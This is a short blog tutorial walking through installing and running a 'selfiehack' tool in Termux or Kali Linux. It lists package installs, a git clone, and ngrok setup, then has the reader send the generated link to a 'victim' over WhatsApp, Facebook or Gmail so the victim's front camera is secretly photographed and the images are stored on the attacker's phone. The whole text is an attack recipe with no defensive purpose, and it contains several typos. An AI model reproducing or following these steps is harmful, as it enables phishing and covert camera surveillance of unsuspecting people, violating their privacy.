Mobile Camera SelfieHack Tool in Kali linux & Termux | JefficJoy

Selfiehack tool installation in mobile (Termux)

Termux app 

Steps to H3CK:
  • pkg update
  • pkg install git
  • pkg install php
  • pkg install openssh
  • pkg install wget
  • pkg install curel
Now install the SELFIHACK Tool

  • git clone https://github.com/JTECHCODE/selfiehack.git
  • ls
  • cd selfiehack
  • ls
  • chmod +x selfiehack.sh (give permissions to run)
  • ./selfiehack.sh
Set ngrok for selfiehack
  • ls 
  • check ngrok and seliehack tools installed.
  • copy ngrok to selfiehack folder
  • cp ngrok $HOME/selfiehack
Now run the saycheese tool using ngrok
  • ./selfiehack.sh
    choose port forwarding option: 02
    starting php server...
    starting ngrok server..
    Direct Link : http://7if0r8ff.ngrok.io

      Now copy the Direct Link
    Send to victim mobile (Whatsapp,Fb and gmail..etc)
    Now target clicked the link
    It can taking front cam snaps

photos are stored in your phone
  • CTRL+C to stop
  • ls
  • Now photo are stored in .png format
  • cp imagename.png/storage/emulated/0/
Use this path default for all mobiles /storage/emulated/0/
Specific folder /storage/emulated/0/foldername
for sdcard /sdcard
Now images are stored in your internal memory storage

Comments